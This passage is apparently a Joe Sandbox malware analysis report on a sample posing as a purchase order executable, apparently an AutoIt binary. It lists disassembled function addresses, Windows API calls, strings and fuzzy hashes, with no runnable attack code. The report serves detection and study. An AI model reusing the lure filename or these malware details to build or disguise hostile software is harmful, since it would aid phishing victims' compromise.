                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __fread_nolock_memmove
                                  • String ID: EA06
                                  • API String ID: 1988441806-3962188686
                                  • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                  • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                  • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                  • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                  Function 00442BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: u,D
                                  • API String ID: 4104443479-3858472334
                                  • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                  • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                  • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                  • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                  Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                  Download Yara Rule
                                  APIs
                                  • _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • _memmove.LIBCMT ref: 00401B57
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                  • String ID: @EXITCODE
                                  • API String ID: 2734553683-3436989551
                                  • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                  • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                  • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                  • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                  Function 004560F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • wsprintfW.USER32 ref: 0045612A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend_mallocwsprintf
                                  • String ID: %d/%02d/%02d
                                  • API String ID: 1262938277-328681919
                                  • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                  • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                  • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                  • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                  Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InternetCloseHandle.WININET(?), ref: 00442663
                                  • InternetCloseHandle.WININET ref: 00442668
                                    • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CloseHandleInternet$ObjectSingleWait
                                  • String ID: aeB
                                  • API String ID: 857135153-906807131
                                  • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                  • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                  • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                  • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                  Function 00433244 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe, xrefs: 0043324B
                                  • ^B, xrefs: 00433248
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _wcsncpy
                                  • String ID: ^B$C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe
                                  • API String ID: 1735881322-3425415338
                                  • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                  • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                                  • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                  • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                                  Function 00441BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                  • PostMessageW.USER32(00000000), ref: 00441C05
                                    • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: FindMessagePostSleepWindow
                                  • String ID: Shell_TrayWnd
                                  • API String ID: 529655941-2988720461
                                  • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                  • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                  • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                  • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                  Function 00441C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                    • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: FindMessagePostSleepWindow
                                  • String ID: Shell_TrayWnd
                                  • API String ID: 529655941-2988720461
                                  • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                  • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                  • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                  • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                  Function 004370C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                    • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Message_doexit
                                  • String ID: AutoIt$Error allocating memory.
                                  • API String ID: 1993061046-4017498283
                                  • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                  • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                  • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                  • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D